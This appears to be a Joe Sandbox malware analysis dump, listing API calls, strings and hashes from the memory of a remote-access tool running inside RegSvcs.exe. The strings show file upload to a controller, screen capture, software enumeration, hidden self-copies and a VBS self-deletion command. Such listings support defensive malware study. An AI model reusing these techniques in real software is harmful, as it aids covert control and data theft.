                              • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                              • _wcslen.LIBCMT ref: 0040CEE6
                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                              • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,00000000,00000000), ref: 0040CF84
                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                              • _wcslen.LIBCMT ref: 0040CFC6
                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                              • ExitProcess.KERNEL32 ref: 0040D062
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                              • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe$del$open
                              • API String ID: 1579085052-1122443586
                              • Opcode ID: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                              • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                              • Opcode Fuzzy Hash: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                              • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                              APIs
                              • lstrlenW.KERNEL32(?), ref: 0041C036
                              • _memcmp.LIBVCRUNTIME ref: 0041C04E
                              • lstrlenW.KERNEL32(?), ref: 0041C067
                              • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                              • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                              • _wcslen.LIBCMT ref: 0041C13B
                              • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                              • GetLastError.KERNEL32 ref: 0041C173
                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                              • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                              • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                              • GetLastError.KERNEL32 ref: 0041C1D0
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                              • String ID: ?
                              • API String ID: 3941738427-1684325040
                              • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                              • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                              • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                              • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$EnvironmentVariable$_wcschr
                              • String ID:
                              • API String ID: 3899193279-0
                              • Opcode ID: 138887d55368f9cf58208da3f492a4fc17d417063cec38a58e843e9613042db9
                              • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                              • Opcode Fuzzy Hash: 138887d55368f9cf58208da3f492a4fc17d417063cec38a58e843e9613042db9
                              • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                              • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                              • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                              • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                              • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                              • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                              • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                              • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                              • Sleep.KERNEL32(00000064), ref: 00412E94
                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                              • String ID: /stext "$0TG$0TG$NG$NG
                              • API String ID: 1223786279-2576077980
                              • Opcode ID: de99695a2377092233645f0904676b2253a7a5c985bfcff82bcc484c3e6878f2
                              • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                              • Opcode Fuzzy Hash: de99695a2377092233645f0904676b2253a7a5c985bfcff82bcc484c3e6878f2
                              • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                              APIs
                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                              • LoadLibraryA.KERNEL32(?), ref: 00414E17
                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                              • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                              • LoadLibraryA.KERNEL32(?), ref: 00414E76
                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                              • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                              • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                              • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                              • API String ID: 2490988753-744132762
                              • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                              • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                              • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                              • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                              APIs
                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                              • GetCursorPos.USER32(?), ref: 0041D5E9
                              • SetForegroundWindow.USER32(?), ref: 0041D5F2
                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                              • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                              • ExitProcess.KERNEL32 ref: 0041D665
                              • CreatePopupMenu.USER32 ref: 0041D66B
                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                              • String ID: Close
                              • API String ID: 1657328048-3535843008
                              • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                              • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                              • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                              • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$Info
                              • String ID:
                              • API String ID: 2509303402-0
                              • Opcode ID: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
                              • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                              • Opcode Fuzzy Hash: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
                              • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                              APIs
                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                              • __aulldiv.LIBCMT ref: 00408D4D
                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                              • CloseHandle.KERNEL32(00000000), ref: 00408F64
                              • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                              • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                              • API String ID: 3086580692-2582957567
                              • Opcode ID: 72fad283c4fe1643dee5b4a459ce18e644925f4e3f1a855a4ff9453ab0215ac4
                              • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                              • Opcode Fuzzy Hash: 72fad283c4fe1643dee5b4a459ce18e644925f4e3f1a855a4ff9453ab0215ac4
                              • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                              APIs
                              • ___free_lconv_mon.LIBCMT ref: 0045130A
                                • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                              • _free.LIBCMT ref: 004512FF
                                • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                              • _free.LIBCMT ref: 00451321
                              • _free.LIBCMT ref: 00451336
                              • _free.LIBCMT ref: 00451341
                              • _free.LIBCMT ref: 00451363
                              • _free.LIBCMT ref: 00451376
                              • _free.LIBCMT ref: 00451384
                              • _free.LIBCMT ref: 0045138F
                              • _free.LIBCMT ref: 004513C7
                              • _free.LIBCMT ref: 004513CE
                              • _free.LIBCMT ref: 004513EB
                              • _free.LIBCMT ref: 00451403
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                              • String ID:
                              • API String ID: 161543041-0
                              • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                              • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                              • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                              • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                              APIs
                              • RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0041C726
                              • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEnumOpen
                              • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$UninstallString
                              • API String ID: 1332880857-3730529168
                              • Opcode ID: f8c39a8c5312d126ce2fea3caf237c12ed67f6eb61076c5a3b07a390ba7738a1
                              • Instruction ID: 30dd124696def6d144da0f01c12024620090e461f41beb3abd2b2340f2562d2c
                              • Opcode Fuzzy Hash: f8c39a8c5312d126ce2fea3caf237c12ed67f6eb61076c5a3b07a390ba7738a1
                              • Instruction Fuzzy Hash: E961F3711082419AD325EF11D851EEFB3E8BF94309F10493FB589921A2FF789E49CA5A
                              APIs
                              • __EH_prolog.LIBCMT ref: 00419FB9
                              • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                              • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                              • GetLocalTime.KERNEL32(?), ref: 0041A105
                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                              • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                              • API String ID: 489098229-1431523004
                              • Opcode ID: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                              • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                              • Opcode Fuzzy Hash: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                              • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                              APIs
                                • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                • Part of subcall function 004136F8: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                • Part of subcall function 004136F8: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                • Part of subcall function 004136F8: RegCloseKey.KERNELBASE(00000000), ref: 00413738
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                              • ExitProcess.KERNEL32 ref: 0040D9C4
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                              • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                              • API String ID: 1913171305-3159800282
                              • Opcode ID: 636c7451f86ad7dcbf51a7e77965c9df5bd33ebd3fbbde82d92fca028294b8c2
                              • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                              • Opcode Fuzzy Hash: 636c7451f86ad7dcbf51a7e77965c9df5bd33ebd3fbbde82d92fca028294b8c2
                              • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                              • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                              • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                              • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                              APIs
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                              • closesocket.WS2_32(000000FF), ref: 00404E5A
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                              • String ID:
                              • API String ID: 3658366068-0
                              • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                              • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                              • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                              • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                              APIs
                                • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                              • GetLastError.KERNEL32 ref: 00455CEF
                              • __dosmaperr.LIBCMT ref: 00455CF6
                              • GetFileType.KERNEL32(00000000), ref: 00455D02
                              • GetLastError.KERNEL32 ref: 00455D0C
                              • __dosmaperr.LIBCMT ref: 00455D15
                              • CloseHandle.KERNEL32(00000000), ref: 00455D35
                              • CloseHandle.KERNEL32(?), ref: 00455E7F
                              • GetLastError.KERNEL32 ref: 00455EB1
                              • __dosmaperr.LIBCMT ref: 00455EB8
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                              • String ID: H
                              • API String ID: 4237864984-2852464175
                              • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                              • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                              • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                              • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID: \&G$\&G$`&G
                              • API String ID: 269201875-253610517
                              • Opcode ID: 2933b358ac1f2d15da9e4f95fb537f888405f593b8ad3400f10d75b262a195a6
                              • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                              • Opcode Fuzzy Hash: 2933b358ac1f2d15da9e4f95fb537f888405f593b8ad3400f10d75b262a195a6
                              • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 65535$udp
                              • API String ID: 0-1267037602
                              • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                              • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                              • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                              • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                              APIs
                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                              • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                              • __dosmaperr.LIBCMT ref: 0043A8A6
                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                              • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                              • __dosmaperr.LIBCMT ref: 0043A8E3
                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                              • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                              • __dosmaperr.LIBCMT ref: 0043A937
                              • _free.LIBCMT ref: 0043A943
                              • _free.LIBCMT ref: 0043A94A
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                              • String ID:
                              • API String ID: 2441525078-0
                              • Opcode ID: 019acc7a2e3de953c23e11cafa5877634505dff612e887b7d59a77d89ef25481
                              • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                              • Opcode Fuzzy Hash: 019acc7a2e3de953c23e11cafa5877634505dff612e887b7d59a77d89ef25481
                              • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                              APIs
                              • SetEvent.KERNEL32(?,?), ref: 004054BF
                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                              • TranslateMessage.USER32(?), ref: 0040557E
                              • DispatchMessageA.USER32(?), ref: 00405589
                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                              • String ID: CloseChat$DisplayMessage$GetMessage
                              • API String ID: 2956720200-749203953
                              • Opcode ID: 685fd760973951ef657dab710ca0ffd0d5e343078631b5a88e9e506cca6722c1
                              • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                              • Opcode Fuzzy Hash: 685fd760973951ef657dab710ca0ffd0d5e343078631b5a88e9e506cca6722c1
                              • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                              APIs
                                • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                              • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                              • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
